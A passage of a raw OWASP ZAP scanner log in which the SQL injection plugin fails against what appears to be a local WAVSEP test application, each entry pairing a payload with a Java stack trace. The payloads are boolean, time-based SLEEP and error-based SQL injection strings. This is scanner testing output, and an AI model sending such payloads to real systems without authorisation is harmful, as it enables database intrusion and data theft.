org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681268 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6031=6031) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6031=6031) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681268 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 1237=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1237=1237) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 1237=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (1237=1237) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681269 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [);(SELECT * FROM (SELECT(SLEEP(5)))qbSq)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://);(SELECT * FROM (SELECT(SLEEP(5)))qbSq)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681269 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 8773=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8773=8773) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('jkIv'='jkIv] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 8773=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8773=8773) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('jkIv'='jkIv at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681271 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;(SELECT * FROM (SELECT(SLEEP(5)))KYLN)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://;(SELECT * FROM (SELECT(SLEEP(5)))KYLN)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681272 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 7818=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7818=7818) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'kdUK'='kdUK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 7818=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7818=7818) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'kdUK'='kdUK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681273 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [');(SELECT * FROM (SELECT(SLEEP(5)))vKyx)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://');(SELECT * FROM (SELECT(SLEEP(5)))vKyx)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681274 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 8812=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8812=8812) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 8812=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8812=8812) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681274 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [';(SELECT * FROM (SELECT(SLEEP(5)))GTYa)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://';(SELECT * FROM (SELECT(SLEEP(5)))GTYa)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681276 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%';(SELECT * FROM (SELECT(SLEEP(5)))CyNF)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%';(SELECT * FROM (SELECT(SLEEP(5)))CyNF)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681276 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 7033=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7033=7033) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- sTsT] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 7033=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (7033=7033) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- sTsT at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681277 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [;(SELECT * FROM (SELECT(SLEEP(5)))MvdZ)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://;(SELECT * FROM (SELECT(SLEEP(5)))MvdZ)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681277 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 6507 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6507=6507,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT 6507 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(6507=6507,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at 